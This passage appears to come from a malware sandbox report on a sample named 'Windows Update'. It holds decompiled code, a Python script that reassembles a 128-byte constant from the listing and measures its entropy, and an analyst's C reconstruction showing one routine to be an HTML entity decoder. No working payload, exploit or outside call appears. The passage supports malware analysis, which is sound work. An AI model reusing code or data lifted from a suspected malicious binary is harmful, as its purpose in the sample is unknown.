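# Assignment statements copied from the decompiled function above and reflowed
# eight per line. `_v231 = _t184` is kept as written so the register mapping is
# exercised: _t184 is the zero result of the preceding L00F2B581 call.
DECOMPILED_ASSIGNMENTS = """
_v280 = 0x1d; _v279 = 0xac; _v278 = 0xa8; _v277 = 0xf8; _v276 = 0xd3; _v275 = 0xb8; _v274 = 0x48; _v273 = 0x3e;
_v272 = 0x48; _v271 = 0x7d; _v270 = 0x3e; _v269 = 0xa; _v268 = 0x62; _v267 = 7; _v266 = 0xdd; _v265 = 0x26;
_v264 = 0xe6; _v263 = 0x67; _v262 = 0x81; _v261 = 3; _v260 = 0xe7; _v259 = 0xb2; _v258 = 0x13; _v257 = 0xa5;
_v256 = 0xb0; _v255 = 0x79; _v254 = 0xee; _v253 = 0x4f; _v252 = 0xf; _v251 = 0x41; _v250 = 0x15; _v249 = 0xed;
_v248 = 0x7b; _v247 = 0x14; _v246 = 0x8c; _v245 = 0xe5; _v244 = 0x4b; _v243 = 0x46; _v242 = 0xd; _v241 = 0xc1;
_v240 = 0x8e; _v239 = 0xfe; _v238 = 0xd6; _v237 = 0xe7; _v236 = 0x27; _v235 = 0x75; _v234 = 6; _v233 = 0x8b;
_v232 = 0x49; _v231 = _t184; _v230 = 0xdc; _v229 = 0xf; _v228 = 0x30; _v227 = 0xa0; _v226 = 0x9e; _v225 = 0xfd;
_v224 = 9; _v223 = 0x85; _v222 = 0xf1; _v221 = 0xc8; _v220 = 0xaa; _v219 = 0x75; _v218 = 0xc1; _v217 = 8;
_v216 = 5; _v215 = 0x79; _v214 = 1; _v213 = 0xe2; _v212 = 0x97; _v211 = 0xd8; _v210 = 0xaf; _v209 = 0x80;
_v208 = 0x38; _v207 = 0x60; _v206 = 0xb; _v205 = 0x71; _v204 = 0xe; _v203 = 0x68; _v202 = 0x53; _v201 = 0x77;
_v200 = 0x2f; _v199 = 0xf; _v198 = 0x61; _v197 = 0xf6; _v196 = 0x1d; _v195 = 0x8e; _v194 = 0x8f; _v193 = 0x5c;
_v192 = 0xb2; _v191 = 0x3d; _v190 = 0x21; _v189 = 0x74; _v188 = 0x40; _v187 = 0x4b; _v186 = 0xb5; _v185 = 6;
_v184 = 0x6e; _v183 = 0xab; _v182 = 0x7a; _v181 = 0xbd; _v180 = 0x8b; _v179 = 0xa9; _v178 = 0x7e; _v177 = 0x32;
_v176 = 0x8f; _v175 = 0x6e; _v174 = 6; _v173 = 0x24; _v172 = 0xd9; _v171 = 0x29; _v170 = 0xa4; _v169 = 0xa5;
_v168 = 0xbe; _v167 = 0x26; _v166 = 0x23; _v165 = 0xfd; _v164 = 0xee; _v163 = 0xf1; _v162 = 0x4c; _v161 = 0xf;
_v160 = 0x74; _v159 = 0x5e; _v158 = 0x58; _v157 = 0xfb; _v156 = 0x91; _v155 = 0x74; _v154 = 0xef; _v153 = 0x91;
"""

# Register temporaries that feed a byte store, and the value they hold at that
# point. _t184 == 0 is read off the `if(_t184 != 0)` guard in the listing.
REGISTER_VALUES = {"_t184": 0}

# `_vNNN = <immediate or temporary>;` where NNN is the slot's distance below ebp.
ASSIGN_RE = re.compile(r"_v(\d+)\s*=\s*(0x[0-9a-fA-F]+|\d+|_t\d+)\s*;")


def parse_byte_stores(text, registers=REGISTER_VALUES):
    """Map frame offset -> byte value for each `_vNNN = ...;` in `text`.

    A later store to the same slot wins, as it would at run time. Values that
    do not fit a byte are rejected: this is for byte-wide slots only.
    """
    stores = {}
    for m in ASSIGN_RE.finditer(text):
        offset, rhs = int(m.group(1)), m.group(2)
        if rhs.startswith("_t"):
            if rhs not in registers:
                raise ValueError(f"unknown temporary {rhs} stored to _v{offset}")
            value = registers[rhs]
        else:
            value = int(rhs, 0)
        if not 0 <= value <= 0xFF:
            raise ValueError(f"_v{offset} = {rhs} is not a byte-wide store")
        stores[offset] = value
    return stores


def find_gaps(stores):
    """Slots between the highest and lowest offset that were never written."""
    hi, lo = max(stores), min(stores)
    return [off for off in range(hi, lo - 1, -1) if off not in stores]


def assemble(stores):
    """Lay the slots out in address order.

    _v280 is the lowest address and _v153 the highest, so descending offset
    is ascending address; a hole would silently shift every later byte, so
    refuse to build from a non-contiguous set.
    """
    gaps = find_gaps(stores)
    if gaps:
        raise ValueError(f"unwritten slots inside the blob: {gaps}")
    return bytes(stores[off] for off in sorted(stores, reverse=True))


def shannon_entropy(data):
    """Bits per byte; log2(len) (7.0 for 128 bytes) is the ceiling."""
    n = len(data)
    counts = [data.count(b) for b in set(data)]
    return -sum(c / n * math.log2(c / n) for c in counts)


def rebuild_listing_blob():
    """The 128-byte constant the function passes (as &_v280) to E00EEC860."""
    return assemble(parse_byte_stores(DECOMPILED_ASSIGNMENTS))


if __name__ == "__main__":
    blob = rebuild_listing_blob()
    print(f"{len(blob)} bytes, {shannon_entropy(blob):.2f} bits/byte")
    for i in range(0, len(blob), 16):
        print(f"_v{280 - i:<3}  {blob[i:i + 16].hex(' ')}")
```

Run as a script it prints the constant as a hex dump keyed by the frame offset of each row, which keeps the mapping back to the listing. The contiguity check in assemble matters more than it looks: a single unwritten slot (or a decompiler that folded two byte stores into one word store) would shift every byte after it, and the resulting blob would look plausible while being wrong. The entropy figure is only a triage hint; with 128 bytes the ceiling is 7.0 bits per byte, so a value close to that is consistent with ciphertext, random key material or compressed data, and says nothing about which.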
                                                                                  0x00eeb1f8
                                                                                  0x00eeb1fa
                                                                                  0x00eeb1ff
                                                                                  0x00eeb205
                                                                                  0x00eeb208
                                                                                  0x00eeb20d
                                                                                  0x00eeb20e
                                                                                  0x00eeb215
                                                                                  0x00eeb21a
                                                                                  0x00eeb22b
                                                                                  0x00eeb22b
                                                                                  0x00eeb233
                                                                                  0x00eeb238
                                                                                  0x00eeb23d
                                                                                  0x00eeb23e
                                                                                  0x00eeb247
                                                                                  0x00eeb258
                                                                                  0x00eeb258
                                                                                  0x00eeb260
                                                                                  0x00eeb265
                                                                                  0x00eeb26a
                                                                                  0x00eeb26b
                                                                                  0x00eeb274
                                                                                  0x00eeb285
                                                                                  0x00eeb285
                                                                                  0x00eeb28d
                                                                                  0x00eeb292
                                                                                  0x00eeb297
                                                                                  0x00eeb298
                                                                                  0x00eeb2a1
                                                                                  0x00eeb744
                                                                                  0x00eeb744

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                  • API String ID: 0-140969752
                                                                                  • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction ID: 914f08c56f4a1d6e57066e572a3d242751288c567baeb7ac2231c872b83ac2df
                                                                                  • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction Fuzzy Hash: 03F1E1209087EDC9DB32C6788C097DDBEA45B23324F0843D9D1A87A2D2D7B54BC58B66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00F4E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                  				signed int _v8;
                                                                                  				void* _v11;
                                                                                  				char _v12;
                                                                                  				char _v13;
                                                                                  				char _v19;
                                                                                  				char _v20;
                                                                                  				char _v21;
                                                                                  				char _v22;
                                                                                  				char _v23;
                                                                                  				char _v24;
                                                                                  				signed int _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				intOrPtr _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				intOrPtr _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				char _v76;
                                                                                  				char _v88;
                                                                                  				intOrPtr _v92;
                                                                                  				intOrPtr _v96;
                                                                                  				intOrPtr _v100;
                                                                                  				intOrPtr _v104;
                                                                                  				intOrPtr _v108;
                                                                                  				intOrPtr _v112;
                                                                                  				intOrPtr _v116;
                                                                                  				intOrPtr _v120;
                                                                                  				intOrPtr _v124;
                                                                                  				intOrPtr _v128;
                                                                                  				intOrPtr _v132;
                                                                                  				intOrPtr _v136;
                                                                                  				intOrPtr _v140;
                                                                                  				intOrPtr _v144;
                                                                                  				intOrPtr _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				intOrPtr _v176;
                                                                                  				intOrPtr _v180;
                                                                                  				intOrPtr _v184;
                                                                                  				intOrPtr _v188;
                                                                                  				intOrPtr _v192;
                                                                                  				intOrPtr _v196;
                                                                                  				intOrPtr _v200;
                                                                                  				intOrPtr _v204;
                                                                                  				intOrPtr _v208;
                                                                                  				intOrPtr _v212;
                                                                                  				intOrPtr _v216;
                                                                                  				intOrPtr _v220;
                                                                                  				intOrPtr _v224;
                                                                                  				intOrPtr _v228;
                                                                                  				intOrPtr _v232;
                                                                                  				intOrPtr _v236;
                                                                                  				intOrPtr _v240;
                                                                                  				intOrPtr _v244;
                                                                                  				intOrPtr _v248;
                                                                                  				intOrPtr _v252;
                                                                                  				intOrPtr _v256;
                                                                                  				intOrPtr _v260;
                                                                                  				intOrPtr _v264;
                                                                                  				intOrPtr _v268;
                                                                                  				intOrPtr _v272;
                                                                                  				intOrPtr _v276;
                                                                                  				intOrPtr _v280;
                                                                                  				intOrPtr _v284;
                                                                                  				intOrPtr _v288;
                                                                                  				intOrPtr _v292;
                                                                                  				intOrPtr _v296;
                                                                                  				intOrPtr _v300;
                                                                                  				intOrPtr _v304;
                                                                                  				intOrPtr _v308;
                                                                                  				intOrPtr _v312;
                                                                                  				intOrPtr _v316;
                                                                                  				intOrPtr _v320;
                                                                                  				intOrPtr _v324;
                                                                                  				intOrPtr _v328;
                                                                                  				intOrPtr _v332;
                                                                                  				intOrPtr _v336;
                                                                                  				intOrPtr _v340;
                                                                                  				intOrPtr _v344;
                                                                                  				intOrPtr _v348;
                                                                                  				intOrPtr _v352;
                                                                                  				intOrPtr _v356;
                                                                                  				intOrPtr _v360;
                                                                                  				intOrPtr _v364;
                                                                                  				intOrPtr _v368;
                                                                                  				intOrPtr _v372;
                                                                                  				intOrPtr _v376;
                                                                                  				intOrPtr _v380;
                                                                                  				intOrPtr _v384;
                                                                                  				intOrPtr _v388;
                                                                                  				intOrPtr _v392;
                                                                                  				intOrPtr _v396;
                                                                                  				intOrPtr _v400;
                                                                                  				intOrPtr _v404;
                                                                                  				intOrPtr _v408;
                                                                                  				intOrPtr _v412;
                                                                                  				intOrPtr _v416;
                                                                                  				intOrPtr _v420;
                                                                                  				intOrPtr _v424;
                                                                                  				intOrPtr _v428;
                                                                                  				intOrPtr _v432;
                                                                                  				intOrPtr _v436;
                                                                                  				intOrPtr _v440;
                                                                                  				intOrPtr _v444;
                                                                                  				intOrPtr _v448;
                                                                                  				intOrPtr _v452;
                                                                                  				intOrPtr _v456;
                                                                                  				intOrPtr _v460;
                                                                                  				intOrPtr _v464;
                                                                                  				intOrPtr _v468;
                                                                                  				intOrPtr* _t200;
                                                                                  				char* _t202;
                                                                                  				signed int _t203;
                                                                                  				intOrPtr _t207;
                                                                                  				intOrPtr _t209;
                                                                                  				intOrPtr _t212;
                                                                                  				char _t215;
                                                                                  				intOrPtr _t216;
                                                                                  				short _t219;
                                                                                  				signed int _t224;
	intOrPtr* _t225;
	intOrPtr _t230;
	intOrPtr* _t231;
	intOrPtr* _t233;
	intOrPtr* _t238;
	signed int _t239;
	signed int _t242;
	intOrPtr _t243;
	intOrPtr* _t244;
	signed int _t245;
	void* _t247;
	void* _t248;
	void* _t249;

	_v64 = 0x413f68;
	_v60 = 0x413f70;
	_v56 = 0x413f74;
	_v52 = 0x413f78;
	_v48 = 0x413f80;
	_v44 = 0x413f88;
	_v24 = 0x26;
	_v23 = 0x3c;
	_v22 = 0x3e;
	_v21 = 0x22;
	_v20 = 0x20;
	_v19 = 0x27;
	_v468 = 0x413f90;
	_v464 = 0x413f98;
	_v460 = 0x413fa0;
	_v456 = 0x413fa8;
	_v452 = 0x413fb0;
	_v448 = 0x413fb8;
	_v444 = 0x413fc0;
	_v440 = 0x413fc8;
	_v436 = 0x413fd0;
	_v432 = 0x413fd8;
	_v428 = 0x413fe0;
	_v424 = 0x413fe8;
	_v420 = 0x413ff0;
	_v416 = 0x413ff8;
	_v412 = 0x414000;
	_v408 = 0x414008;
	_v404 = 0x414010;
	_v400 = 0x414018;
	_v396 = 0x414020;
	_v392 = 0x414028;
	_v388 = 0x414030;
	_v384 = 0x414038;
	_v380 = 0x414040;
	_v376 = 0x414048;
	_v372 = 0x414050;
	_v368 = 0x414058;
	_v364 = 0x414060;
	_v360 = 0x414068;
	_v356 = 0x414070;
	_v352 = 0x414078;
	_v348 = 0x414080;
	_v344 = 0x414088;
	_v340 = 0x414090;
	_v336 = 0x414098;
	_v332 = 0x4140a0;
	_v328 = 0x4140a8;
	_v324 = 0x4140b0;
	_v320 = 0x4140b8;
	_v316 = 0x4140c0;
	_v312 = 0x4140c8;
	_v308 = 0x4140d0;
	_v304 = 0x4140d8;
	_v300 = 0x4140e0;
	_v296 = 0x4140e8;
	_v292 = 0x4140f0;
	_v288 = 0x4140f8;
	_v284 = 0x414100;
	_v280 = 0x414108;
	_v276 = 0x414110;
	_v272 = 0x414118;
	_v268 = 0x414120;
	_v264 = 0x414128;
	_v260 = 0x414130;
	_v256 = 0x414138;
	_v252 = 0x414140;
	_v248 = 0x414148;
	_v244 = 0x414150;
	_v240 = 0x414158;
	_v236 = 0x414160;
	_v232 = 0x414168;
	_v228 = 0x414170;
	_v224 = 0x414178;
	_v220 = 0x414180;
	_v216 = 0x414188;
	_v212 = 0x414190;
	_v208 = 0x414198;
	_v204 = 0x4141a0;
	_t200 = _a8;
	_v28 = _v28 | 0xffffffff;
	_t224 = 0;
	_t247 = 0;
	_v200 = 0x4141a8;
	_v196 = 0x4141b0;
	_v192 = 0x4141b8;
	_v188 = 0x4141c0;
	_v184 = 0x4141c8;
	_v180 = 0x4141d0;
	_v176 = 0x4141d8;
	_v172 = 0x4141e0;
	_v168 = 0x4141e8;
	_v164 = 0x4141f0;
	_v160 = 0x4141f8;
	_v156 = 0x414200;
	_v152 = 0x414208;
	_v148 = 0x414210;
	_v144 = 0x414218;
	_v140 = 0x414220;
	_v136 = 0x414228;
	_v132 = 0x414230;
	_v128 = 0x414238;
	_v124 = 0x414240;
	_v120 = 0x414248;
	_v116 = 0x414250;
	_v112 = 0x414258;
	_v108 = 0x414260;
	_v104 = 0x414268;
	_v100 = 0x414270;
	_v96 = 0x414278;
	_v92 = 0x414280;
	if( *_t200 == 0) {
		L45:
		_t202 = _a4 + _t224;
		 *_t202 = 0;
		if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
			return _t202;
		} else {
			 *((char*)(_t202 - 1)) = 0;
			return _t202;
		}
	}
	while(_a12 == 0xffffffff || _a12 > _t247) {
		_t225 = _t247 + _t200;
		_t203 =  *_t225;
		_v13 = _t203;
		if(_t203 != 0x26) {
			L33:
			if(_a16 == 0 || _t203 > 0x20) {
				 *((char*)(_t224 + _a4)) = _t203;
				_t224 = _t224 + 1;
			} else {
				if(_t224 != _v28) {
					 *((char*)(_t224 + _a4)) = 0x20;
					_t224 = _t224 + 1;
					if(_a20 != 0 && _t224 == 1) {
						_t224 = 0;
					}
				}
				_v28 = _t224;
			}
			_t247 = _t247 + 1;
			L43:
			_t200 = _a8;
			if( *((char*)(_t247 + _t200)) != 0) {
				continue;
			}
			break;
		}
		_t242 = 0;
		_v36 = _t225 + 1;
		while(1) {
			_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
			L00F503B6();
			_push(_t203);
			_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
			_v8 = _t203;
			_push(_v36);
			L00F504AE();
			_t249 = _t249 + 0x10;
			if(_t203 == 0) {
				break;
			}
			_t242 = _t242 + 1;
			if(_t242 < 6) {
				continue;
			}
			_t207 = _a8;
			if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
				L29:
				_v8 = _v8 & 0x00000000;
				while(1) {
					_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
					_push(_t209);
					_v40 = _t209;
					L00F503B6();
					_t243 = _t209;
					_push(_t243);
					_push(_v40);
					_push(_v36);
					L00F504AE();
					_t249 = _t249 + 0x10;
					if(_t209 == 0) {
						break;
					}
					_v8 = _v8 + 1;
					if(_v8 < 0x5f) {
						continue;
					}
					_t203 = _v13;
					goto L33;
				}
				 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
				_t224 = _t224 + 1;
				_t247 = _t247 + _t243 + 1;
				goto L43;
			}
			_t128 = _t207 + 2; // 0x2
			_t244 = _t247 + _t128;
			_t230 =  *_t244;
			if(_t230 == 0x78 || _t230 == 0x58) {
				_t159 = _t207 + 3; // 0x3
				_t238 = _t247 + _t159;
				_t231 = _t238;
				_t245 = 0;
				while(1) {
					_t212 =  *_t231;
					if(_t212 == 0) {
						break;
					}
					if(_t212 == 0x3b) {
						L27:
						if(_t245 <= 0) {
							goto L29;
						}
						_push(_t245);
						_push(_t238);
						_push( &_v88);
						L00F5043C();
						 *((char*)(_t248 + _t245 - 0x54)) = 0;
						_t215 = E00F45384( &_v88,  &_v88);
						_t249 = _t249 + 0x10;
						 *((char*)(_t224 + _a4)) = _t215;
						_t224 = _t224 + 1;
						_t247 = _t247 + _t245 + 4;
						goto L43;
					}
					_t245 = _t245 + 1;
					if(_t245 >= 4) {
						break;
					}
					_t231 = _t231 + 1;
				}
				_t245 = _t245 | 0xffffffff;
				goto L27;
			} else {
				_t233 = _t244;
				_t239 = 0;
				while(1) {
					_t216 =  *_t233;
					if(_t216 == 0) {
						break;
					}
					if(_t216 == 0x3b) {
						_v8 = _t239;
						L18:
						if(_v8 <= 0) {
							goto L29;
						}
						L00F5043C();
						 *((char*)(_t248 + _v8 - 0x48)) = 0;
						_t219 =  &_v76;
						L00F50430();
						_t249 = _t249 + 0x10;
						_v32 = _t219;
						_v12 = 0;
						asm("stosb");
						_v30 = 0;
						 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
						 *((char*)(_t224 + _a4)) = _v12;
						_t224 = _t224 + 1;
						_t247 = _t247 + _v8 + 3;
						goto L43;
					}
					_t239 = _t239 + 1;
					if(_t239 >= 6) {
						break;
					}
					_t233 = _t233 + 1;
				}
				_v8 = _v8 | 0xffffffff;
				goto L18;
			}
		}
		 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
		_t224 = _t224 + 1;
		_t247 = _t247 + _v8 + 1;
		goto L43;
	}
	goto L45;
}
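Analyst reading of the routine above, added here as an editorial reconstruction. It is not code recovered from Sample_B.exe, and none of the names in it come from the binary. What the decompile does: it walks a byte string and, on each 0x26 ('&'), first tries six short names whose replacement bytes are 0x26 0x3c 0x3e 0x22 0x20 0x27, then a '&#x' hex reference (at most 3 digits, because the scan loop gives up at 4 bytes without a ';'), then a '&#' decimal reference (at most 5 digits) that is pushed through an 8-argument import at 0x4120d4, and finally a table of 0x5f (95) names whose hit index is emitted as (index - 0x5f), i.e. bytes 0xA1..0xFF. One argument (_a16) collapses runs of bytes <= 0x20 into a single space, another (_a20) drops a leading and a trailing space, and _a12 is a length limit with 0xffffffff meaning none. That is an HTML entity decoder for the ISO-8859-1 named entities. Everything the report does not show is assumed and marked as such in the code: the string contents at 0x413f68.. and 0x413f90.. (taken to be amp/lt/gt/quot/nbsp/apos and iexcl..yuml), that L00F503B6, L00F504AE, L00F5043C, L00F50430 and E00F45384 behave as strlen, strncmp, strncpy, atoi and a hex parser, that the call through 0x4120d4 is WideCharToMultiByte(CP_ACP, ...) (replaced by a one-line stand-in), and that the comparison against 0x20 is unsigned. The function and parameter names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ASSUMED contents of the six 8-byte-stride strings at 0x413f68..0x413f88; only their
 * replacement bytes (0x26 0x3c 0x3e 0x22 0x20 0x27) are visible in the decompile. */
static const char *const short_names[6] = { "amp;", "lt;", "gt;", "quot;", "nbsp;", "apos;" };
static const char        short_repl[6]  = { '&', '<', '>', '"', ' ', '\'' };

/* ASSUMED contents of the 0x5f (95) strings at 0x413f90..0x414280: the decompile emits
 * (index - 0x5f) as a byte, i.e. 0xA1 + index, which is the ISO-8859-1 entity order. */
static const char *const latin1_names[95] = {
 "iexcl;","cent;","pound;","curren;","yen;","brvbar;","sect;","uml;","copy;","ordf;","laquo;","not;",
 "shy;","reg;","macr;","deg;","plusmn;","sup2;","sup3;","acute;","micro;","para;","middot;","cedil;",
 "sup1;","ordm;","raquo;","frac14;","frac12;","frac34;","iquest;","Agrave;","Aacute;","Acirc;","Atilde;","Auml;",
 "Aring;","AElig;","Ccedil;","Egrave;","Eacute;","Ecirc;","Euml;","Igrave;","Iacute;","Icirc;","Iuml;","ETH;",
 "Ntilde;","Ograve;","Oacute;","Ocirc;","Otilde;","Ouml;","times;","Oslash;","Ugrave;","Uacute;","Ucirc;","Uuml;",
 "Yacute;","THORN;","szlig;","agrave;","aacute;","acirc;","atilde;","auml;","aring;","aelig;","ccedil;","egrave;",
 "eacute;","ecirc;","euml;","igrave;","iacute;","icirc;","iuml;","eth;","ntilde;","ograve;","oacute;","ocirc;",
 "otilde;","ouml;","divide;","oslash;","ugrave;","uacute;","ucirc;","uuml;","yacute;","thorn;","yuml;" };

/* Stand-in for the import called through 0x4120d4. The call shape (0, 0, &wc, -1, &out, 2, 0, 0)
 * matches WideCharToMultiByte(CP_ACP, ...); that identification is an ASSUMPTION. Here code
 * points above 0xFF become '?' instead of whatever the ANSI code page would produce. */
static char to_ansi(int cp) { return (cp >= 0 && cp <= 0xFF) ? (char)cp : '?'; }

/* The two digit-scanning loops of the decompile: bytes before ';', or -1 at NUL or once `limit`
 * bytes have passed without a ';'. limit 4 allows at most 3 hex digits, limit 6 at most 5 decimal. */
static int scan_to_semicolon(const char *s, int limit)
{
    int n = 0;
    for (;;) {
        if (s[n] == 0) return -1;
        if (s[n] == ';') return n;
        if (++n >= limit) return -1;
    }
}

/* Reconstructed signature; parameter roles inferred from _a4.._a20. `out` needs strlen(in)+1
 * bytes (decoding never grows the text). max_in: stop once that many input bytes are consumed,
 * -1 = unlimited. collapse: runs of bytes <= 0x20 become one ' '. trim: no leading/trailing ' '.
 * Returns a pointer to the NUL it writes at out[j], as the decompile returns _a4 + _t224. */
char *decode_entities(char *out, const char *in, int max_in, int collapse, int trim)
{
    int i = 0, j = 0, last_space = -1;             /* last_space plays the role of _v28 */
    char buf[8];

    while (in[i] != 0 && (max_in == -1 || i < max_in)) {
        unsigned char c = (unsigned char)in[i];     /* ASSUMED: unsigned compare with 0x20 */
        if (c == '&') {
            const char *p = in + i + 1;
            int k, n = 0;
            for (k = 0; k < 6; k++) {
                n = (int)strlen(short_names[k]);
                if (strncmp(p, short_names[k], (size_t)n) == 0) break;
            }
            if (k < 6) { out[j++] = short_repl[k]; i += n + 1; continue; }
            if (p[0] == '#' && (p[1] == 'x' || p[1] == 'X')) {
                if ((n = scan_to_semicolon(p + 2, 4)) > 0) {
                    memcpy(buf, p + 2, (size_t)n); buf[n] = 0;
                    out[j++] = (char)strtol(buf, NULL, 16);
                    i += n + 4;                     /* '&' '#' 'x' digits ';' */
                    continue;
                }
            } else if (p[0] == '#') {
                if ((n = scan_to_semicolon(p + 1, 6)) > 0) {
                    memcpy(buf, p + 1, (size_t)n); buf[n] = 0;
                    out[j++] = to_ansi(atoi(buf));
                    i += n + 3;                     /* '&' '#' digits ';' */
                    continue;
                }
            }
            for (k = 0; k < 95; k++) {
                n = (int)strlen(latin1_names[k]);
                if (strncmp(p, latin1_names[k], (size_t)n) == 0) break;
            }
            if (k < 95) { out[j++] = (char)(0xA1 + k); i += n + 1; continue; }
            /* nothing matched: fall through and copy the '&' literally */
        }
        if (!collapse || c > 0x20) {
            out[j++] = (char)c;
        } else {
            if (j != last_space) {
                out[j++] = ' ';
                if (trim && j == 1) j = 0;          /* never start the output with a space */
            }
            last_space = j;
        }
        i++;
    }
    out[j] = 0;
    if (trim && j > 0 && out[j - 1] == ' ') out[j - 1] = 0;
    return out + j;
}

/* Helpers for checking results: decode into a static buffer / report the returned offset. */
const char *decode_str(const char *in, int max_in, int collapse, int trim)
{
    static char out[256];
    decode_entities(out, in, max_in, collapse, trim);
    return out;
}
int decode_end_offset(const char *in, int max_in, int collapse, int trim)
{
    char out[256];
    return (int)(decode_entities(out, in, max_in, collapse, trim) - out);
}

int main(void)
{
    /* constructed input, not data taken from the report */
    printf("%s\n", decode_str("  Caf&eacute; &lt;b&gt; &amp;&amp; &#x41;&#66; &#x20AC;  ", -1, 1, 1));
    return 0;
}
```

Two behaviours worth knowing when this routine turns up in the harvested data: an unrecognised entity, including a four-digit hex reference such as &#x20AC;, is copied through unchanged rather than dropped, and with trimming enabled the returned end pointer sits one byte past the string's real terminator, because the trailing space is nulled after _a4 + _t224 has been computed.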

Address column for this function (0x00f4e685 .. 0x00f4e86b); the accompanying instruction text did not survive extraction:
0x00f4e685 0x00f4e68c 0x00f4e693 0x00f4e69a 0x00f4e6a1 0x00f4e6a8 0x00f4e6af 0x00f4e6b3 0x00f4e6b7 0x00f4e6bb 0x00f4e6bf 0x00f4e6c3 0x00f4e6c7 0x00f4e6d1
0x00f4e6db 0x00f4e6e5 0x00f4e6ef 0x00f4e6f9 0x00f4e703 0x00f4e70d 0x00f4e717 0x00f4e721 0x00f4e72b 0x00f4e735 0x00f4e73f 0x00f4e749 0x00f4e753 0x00f4e75d
0x00f4e767 0x00f4e771 0x00f4e77b 0x00f4e785 0x00f4e78f 0x00f4e799 0x00f4e7a3 0x00f4e7ad 0x00f4e7b7 0x00f4e7c1 0x00f4e7cb 0x00f4e7d5 0x00f4e7df 0x00f4e7e9
0x00f4e7f3 0x00f4e7fd 0x00f4e807 0x00f4e811 0x00f4e81b 0x00f4e825 0x00f4e82f 0x00f4e839 0x00f4e843 0x00f4e84d 0x00f4e857 0x00f4e861 0x00f4e86b
                                                                                  0x00f4e875
                                                                                  0x00f4e87f
                                                                                  0x00f4e889
                                                                                  0x00f4e893
                                                                                  0x00f4e89d
                                                                                  0x00f4e8a7
                                                                                  0x00f4e8b1
                                                                                  0x00f4e8bb
                                                                                  0x00f4e8c5
                                                                                  0x00f4e8cf
                                                                                  0x00f4e8d9
                                                                                  0x00f4e8e3
                                                                                  0x00f4e8ed
                                                                                  0x00f4e8f7
                                                                                  0x00f4e901
                                                                                  0x00f4e90b
                                                                                  0x00f4e915
                                                                                  0x00f4e91f
                                                                                  0x00f4e929
                                                                                  0x00f4e933
                                                                                  0x00f4e93d
                                                                                  0x00f4e947
                                                                                  0x00f4e951
                                                                                  0x00f4e95b
                                                                                  0x00f4e965
                                                                                  0x00f4e968
                                                                                  0x00f4e96c
                                                                                  0x00f4e96e
                                                                                  0x00f4e972
                                                                                  0x00f4e97c
                                                                                  0x00f4e986
                                                                                  0x00f4e990
                                                                                  0x00f4e99a
                                                                                  0x00f4e9a4
                                                                                  0x00f4e9ae
                                                                                  0x00f4e9b8
                                                                                  0x00f4e9c2
                                                                                  0x00f4e9cc
                                                                                  0x00f4e9d6
                                                                                  0x00f4e9e0
                                                                                  0x00f4e9ea
                                                                                  0x00f4e9f4
                                                                                  0x00f4e9fe
                                                                                  0x00f4ea08
                                                                                  0x00f4ea12
                                                                                  0x00f4ea1c
                                                                                  0x00f4ea23
                                                                                  0x00f4ea2a
                                                                                  0x00f4ea31
                                                                                  0x00f4ea38
                                                                                  0x00f4ea3f
                                                                                  0x00f4ea46
                                                                                  0x00f4ea4d
                                                                                  0x00f4ea54
                                                                                  0x00f4ea5b
                                                                                  0x00f4ea62
                                                                                  0x00f4ea69
                                                                                  0x00f4ec57
                                                                                  0x00f4ec5a
                                                                                  0x00f4ec60
                                                                                  0x00f4ec63
                                                                                  0x00f4ec76
                                                                                  0x00f4ec6f
                                                                                  0x00f4ec6f
                                                                                  0x00000000
                                                                                  0x00f4ec6f
                                                                                  0x00f4ec63
                                                                                  0x00f4ea70
                                                                                  0x00f4ea7f
                                                                                  0x00f4ea82
                                                                                  0x00f4ea86
                                                                                  0x00f4ea89
                                                                                  0x00f4ec06
                                                                                  0x00f4ec0a
                                                                                  0x00f4ec44
                                                                                  0x00f4ec47
                                                                                  0x00f4ec10
                                                                                  0x00f4ec13
                                                                                  0x00f4ec18
                                                                                  0x00f4ec1c
                                                                                  0x00f4ec21
                                                                                  0x00f4ec28
                                                                                  0x00f4ec28
                                                                                  0x00f4ec21
                                                                                  0x00f4ec2a
                                                                                  0x00f4ec2a
                                                                                  0x00f4ec48
                                                                                  0x00f4ec49
                                                                                  0x00f4ec49
                                                                                  0x00f4ec50
